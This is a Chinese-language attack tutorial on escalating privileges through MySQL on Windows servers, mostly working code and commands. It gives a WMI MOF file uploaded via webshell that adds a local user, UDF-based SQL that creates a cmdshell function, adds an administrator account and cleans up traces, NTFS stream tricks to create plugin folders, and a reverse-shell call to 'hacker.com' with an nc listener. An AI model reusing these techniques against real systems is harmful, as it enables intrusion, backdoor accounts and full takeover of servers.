一，利用MOF提權

Windows 管理規範 (WMI) 提供了以下三種方法編譯到 WMI 存儲庫的托管對象格式 (MOF) 文件：

方法 1： 運行 MOF 文件指定為命令行參數將 Mofcomp.exe 文件。

方法 2： 使用 IMofCompiler 接口和 $ CompileFile 方法。

方法 3： 拖放到 %SystemRoot%\System32\Wbem\MOF 文件夾的 MOF 文件。

Microsoft 建議您到存儲庫編譯 MOF 文件使用前兩種方法。也就是運行 Mofcomp.exe 文件，或使用 IMofCompiler::CompileFile 方法。

第三種方法僅為向後兼容性與早期版本的 WMI 提供，並因為此功能可能不會提供在將來的版本後，不應使用。

操作步驟

1，通過webshell上傳 nullevt.mof 文件到可寫目錄，nullevt.mof 代碼如下：

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user demon 123456 /add\")";
 

};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};

2，通過SQL語句 讀取nullevt.mof，然後導出到 mof 目錄下

select load_file(‘C:/recycler/nullevt.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof‘

二，利用UDF提權

udf提權這是最常見的提權方式了，但是往往在執行過程中老是遇到"Can‘t open shared library"的情況，這裏我們可以利用NTFS ADS流來解決這個問題。

1、最常見的是直接使用udf.php此類的工具來執行udf提權，具體如下。

連接到mysql以後，先導出udf.dll到 c:\windows\system32 目錄下。

2、創建相應的函數並執行命令，具體如下：

create function cmdshell returns string soname ‘udf.dll‘; -- 創建函數
select cmdshell(‘net user demon 123456 /add‘);  
select cmdshell(‘net localgroup administrators demon /add‘);
drop function cmdshell; -- 刪除函數
delete from mysql.func where name=‘cmdshell‘  -- 刪除函數

3、某些情況下，我們會遇到Can‘t open shared library的情況，這時就需要我們把udf.dll導出到lib\plugin目錄下才可以，

但是默認情況下plugin不存在，怎麽辦？ 還好有大牛研究出了利用NTFS ADS流來創建文件夾的方法

select @@basedir;   -- 查找到mysql的目錄
select ‘It is dll‘ into dumpfile ‘C:\\Program Files\\phpstudy\\MySQL\\lib::$INDEX_ALLOCATION‘;  -- 利用NTFS ADS創建lib目錄
select ‘It is dll‘ into dumpfile ‘C:\\Program Files\\phpstudy\\MySQL\\lib\\plugin::$INDEX_ALLOCATION‘; -- 利用NTFS ADS創建plugin目錄

• 當默認udf導出失敗時，可以嘗試用手動方法導出udf進行提權，具體方法如下：
  先上傳udf.dll，連接到mysql，再按下面步驟執行sql語句。

      create table zz(abc longblob);//註意列類型為longblob
      insert into zz values(load_file(‘C:\\udf.dll‘)); //上傳的udf.dll路徑
      select * from zz into dumpfile ‘C://WINDOWS//system32//udf.dll‘; //導入的目標地址 mysql 5.0以上要導入到系統目錄
      Create Function MyCmd returns string soname ‘udf.dll‘; //這裏如果導出的路徑為C://WINDOWS//system32//udf2.dll‘ 可以將後面改成udf2.dll
      select MyCmd (‘ net user ‘);
      drop function MyCmd;

  刪除udf.dll 的方法，先刪除生成的函數
  Drop function MyCmd;

三，反彈 shell 提權

假如我們掃到了一個mysql的root弱密碼，並且可以外連，但是服務器上面的網站又無法Getshell，這時我們怎麽辦呢？

1、利用mysql客戶端工具連接mysql服務器，然後執行下面的操作。

mysql.exe -h target.com -uroot -p password
mysql> \. c:\mysql.txt
mysql> select backshell("hacker.com",444);

2、本地監聽你反彈的端口

nc.exe -vlp 444

成功後，你將獲得一個system權限的cmdshell，其實這個也是利用的UDF提權。

mysql常用的提權方法